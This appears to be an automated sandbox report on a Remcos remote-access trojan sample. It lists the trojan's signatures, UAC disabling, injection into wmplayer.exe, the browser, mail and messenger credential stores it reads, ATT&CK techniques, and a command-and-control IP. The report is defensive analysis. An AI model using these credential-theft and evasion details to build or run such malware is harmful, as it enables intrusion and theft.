                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_004513B7
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: GetLocaleInfoW,6_2_00447597
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,6_2_00450A7F
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: EnumSystemLocalesW,6_2_00450CF7
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: EnumSystemLocalesW,6_2_00450D42
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: EnumSystemLocalesW,6_2_00450DDD
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,6_2_00450E6A
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Queries volume information: C:\Users\user\Desktop\IB9876789000.bat.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00404915 GetLocalTime,CreateEventA,CreateThread,6_2_00404915
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041A7A2 GetComputerNameExW,GetUserNameW,6_2_0041A7A2
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,6_2_0044800F
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_0041739B GetVersionExW,13_2_0041739B
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings

                    Source: C:\Users\user\Desktop\IB9876789000.bat.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
                    Source: Amcache.hve.10.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.10.dr | Binary or memory string: msmpeng.exe
                    Source: Amcache.hve.10.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.10.dr | Binary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.IB9876789000.bat.exe.24311499ec0.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.IB9876789000.bat.exe.24311512308.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.regedit.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.regedit.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.IB9876789000.bat.exe.24311512308.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.IB9876789000.bat.exe.24311499ec0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000006.00000002.4568587228.0000000000D6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000003.2210276117.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000002.4568652617.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: IB9876789000.bat.exe PID: 1220, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: regedit.exe PID: 1900, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: wmplayer.exe PID: 7172, type: MEMORYSTR
                    Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data6_2_0040B21B
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\6_2_0040B335
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: \key3.db6_2_0040B335
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: ESMTPPassword14_2_004033F0
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword14_2_00402DB3
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword14_2_00402DB3
                    Source: Yara match | File source: Process Memory Space: wmplayer.exe PID: 7172, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: wmplayer.exe PID: 7500, type: MEMORYSTR

                    Remote Access Functionality

                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-MKYDDH
                    Source: Yara match | File source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.IB9876789000.bat.exe.24311499ec0.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.IB9876789000.bat.exe.24311512308.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.regedit.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.regedit.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.IB9876789000.bat.exe.24311512308.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.IB9876789000.bat.exe.24311499ec0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000006.00000002.4568587228.0000000000D6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000003.2210276117.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000002.4568652617.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: IB9876789000.bat.exe PID: 1220, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: regedit.exe PID: 1900, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: wmplayer.exe PID: 7172, type: MEMORYSTR
                    Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Code function: cmd.exe6_2_00405042
                    MITRE ATT&CK Matrix (the matrix was flattened during extraction; listed below, grouped by tactic, are the techniques the report flags for this sample, with the report's count badges reproduced in brackets exactly as shown)

                    Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration: no techniques flagged
                    Execution: Windows Management Instrumentation [1]; Native API [111]; Command and Scripting Interpreter [12]; Service Execution [2]
                    Persistence: DLL Side-Loading [1]; Windows Service [1]
                    Privilege Escalation: DLL Side-Loading [1]; Bypass User Account Control [1]; Access Token Manipulation [1]; Windows Service [1]; Process Injection [422]
                    Defense Evasion: Disable or Modify Tools [21]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; Software Packing [1]; DLL Side-Loading [1]; Bypass User Account Control [1]; Masquerading [1]; Modify Registry [1]; Virtualization/Sandbox Evasion [151]; Access Token Manipulation [1]; Process Injection [422]
                    Credential Access: OS Credential Dumping [2]; Input Capture [211]; Credentials in Registry [2]; Credentials In Files [3]
                    Discovery: System Time Discovery [2]; Account Discovery [1]; System Service Discovery [1]; File and Directory Discovery [3]; System Information Discovery [38]; Security Software Discovery [261]; Virtualization/Sandbox Evasion [151]; Process Discovery [4]; Application Window Discovery [1]; System Owner/User Discovery [1]
                    Collection: Archive Collected Data [11]; Data from Local System [1]; Email Collection [1]; Input Capture [211]; Clipboard Data [3]
                    Command and Control: Ingress Tool Transfer [12]; Encrypted Channel [2]; Remote Access Software [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [12]
                    Impact: System Shutdown/Reboot [1]; Defacement [1]
                    Behavior Graph (ID: 1570827; Sample: IB9876789000.bat.exe; Startdate: 08/12/2024; Architecture: WINDOWS; Score: 100). The rendered graph did not survive extraction; its nodes and edges are listed below.

                    Start node: DNS/IP: geoplugin.net. Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 19 other signatures. Started process: IB9876789000.bat.exe
                    IB9876789000.bat.exe: Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Uses regedit.exe to modify the Windows registry; 4 other signatures. Started processes: wmplayer.exe; powershell.exe; WerFault.exe; 3 other processes
                    wmplayer.exe: DNS/IP: 192.210.150.26, 3678, 49717, 49719 (AS-COLOCROSSINGUS, United States); geoplugin.net 178.237.33.50, 49720, 80 (ATOM86-ASATOM86NL, Netherlands). Dropped file: C:\ProgramData\remcos\logs.dat (data). Signatures: Detected Remcos RAT; Maps a DLL or memory area into another process; Installs a global keyboard hook. Started processes: wmplayer.exe (four child instances)
                    powershell.exe: Signature: Loading BitLocker PowerShell Module. Started processes: WmiPrvSE.exe; conhost.exe
                    wmplayer.exe (first child instance): Signatures: Tries to steal Instant Messenger accounts or passwords; Tries to harvest and steal browser information (history, passwords, etc)
                    wmplayer.exe (second child instance): Signature: Tries to steal Mail credentials (via file / registry access)

                    Source | Detection | Scanner | Label | Link
                    IB9876789000.bat.exe | 42% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla |
                    IB9876789000.bat.exe | 100% | Joe Sandbox ML | |
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
                    http://www.imvu.comr | 0% | Avira URL Cloud | safe |
                    http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe |
                    http://www.ebuddy.com | 0% | Avira URL Cloud | safe |
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    geoplugin.net | 178.237.33.50 | true | false | | high
                    Name | Malicious | Antivirus Detection | Reputation
                    http://geoplugin.net/json.gp | false | | high
                    Name | Source | Malicious | Antivirus Detection | Reputation
                    http://geoplugin.net/json.gpQM | wmplayer.exe, 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P | bhvCBB7.tmp.13.dr | false | | high
                    https://www.office.com/ | bhvCBB7.tmp.13.dr | false | | high
                    http://www.imvu.comr | wmplayer.exe, 00000006.00000002.4568924546.0000000004CF0000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    http://geoplugin.net/json.gpl; | wmplayer.exe, 00000006.00000003.2182089097.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.4568652617.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2186212492.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2210276117.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949e | bhvCBB7.tmp.13.dr | false | | high
                    http://www.imvu.com | wmplayer.exe, wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wmplayer.exe, 0000000F.00000002.2194687494.00000000006BD000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    http://upx.sf.net | Amcache.hve.10.dr | false | | high
                    http://www.nirsoft.net | wmplayer.exe, 0000000D.00000002.2210606023.0000000000D24000.00000004.00000010.00020000.00000000.sdmp | false | | high
                    https://aefd.nelreports.net/api/report?cat=bingaotak | bhvCBB7.tmp.13.dr | false | | high
                    https://deff.nelreports.net/api/report?cat=msn | bhvCBB7.tmp.13.dr | false | | high
                    http://geoplugin.net/json.gpy | wmplayer.exe, 00000006.00000003.2182089097.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2186212492.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    http://geoplugin.net/json.gpSystem32 | wmplayer.exe, 00000006.00000003.2182089097.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2210276117.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.4568652617.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2186212492.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | wmplayer.exe, 00000006.00000002.4568924546.0000000004CF0000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    https://www.google.com | wmplayer.exe, wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
                    https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073 | bhvCBB7.tmp.13.dr | false | | high
                    https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF | bhvCBB7.tmp.13.dr | false | | high
                    http://geoplugin.net/ | wmplayer.exe, 00000006.00000003.2182089097.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2210276117.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.4568652617.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2186212492.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    https://aefd.nelreports.net/api/report?cat=bingaot | bhvCBB7.tmp.13.dr | false | | high
                    http://geoplugin.net/json.gp/C | IB9876789000.bat.exe, 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, regedit.exe, 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | | high
                    https://maps.windows.com/windows-app-web-link | bhvCBB7.tmp.13.dr | false | | high
                    http://geoplugin.net/json.gp&V | wmplayer.exe, 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    http://geoplugin.net/json.gp=M | wmplayer.exe, 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    http://geoplugin.net/p | wmplayer.exe, 00000006.00000003.2182089097.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2210276117.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2186212492.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    https://aefd.nelreports.net/api/report?cat=bingrms | bhvCBB7.tmp.13.dr | false | | high
                                                                      https://www.google.com/accounts/serviceloginwmplayer.exefalse
                                                                        high
                                                                        https://login.yahoo.com/config/loginwmplayer.exefalse
                                                                          high
                                                                          http://www.nirsoft.net/wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.imvu.comatawmplayer.exe, 0000000F.00000002.2194687494.00000000006BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://geoplugin.net/json.gpGMwmplayer.exe, 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.ebuddy.comwmplayer.exe, wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
192.210.150.26 | unknown | United States | 36352 | AS-COLOCROSSING (US) | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-AS ATOM86 (NL) | false
                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1570827
                                                                                Start date and time:2024-12-08 08:41:06 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 9m 0s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:18
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:IB9876789000.bat.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.rans.phis.troj.spyw.expl.evad.winEXE@21/15@1/2
                                                                                EGA Information:
                                                                                • Successful, ratio: 100%
                                                                                HCA Information:
                                                                                • Successful, ratio: 91%
                                                                                • Number of executed functions: 147
                                                                                • Number of non-executed functions: 313
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe
                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 52.168.117.173
                                                                                • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                • VT rate limit hit for: IB9876789000.bat.exe
Time | Type | Description
02:42:10 | API Interceptor | 23x Sleep call for process: powershell.exe modified
02:42:18 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
02:42:41 | API Interceptor | 6737374x Sleep call for process: wmplayer.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
192.210.150.26 | z49FACTURA-0987678.exe | malicious | Remcos |
192.210.150.26 | FAT6789098700900.scr.exe | malicious | Remcos |
192.210.150.26 | Rgh99876k7e.exe | malicious | Remcos |
192.210.150.26 | SALKI098765R400.exe | malicious | Remcos |
192.210.150.26 | FTE98767800000.bat.exe | malicious | Remcos |
178.237.33.50 | 1733479274764e7b4f05da07e19f78d3cf31f2aafa2f5d7a78af2fd18749e25dbbc1473b66785.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 17334752451c3a43189360a7e5b86f13b5ea7a6044304256a8f4c49ad5d5bd4831e72ee12e792.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | scan_241205-801_draft_PO.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | NewOrder12052024.js | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | W6iQkG4jZ1.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | VERSION.dll.dll | malicious | Remcos | geoplugin.net/json.gp
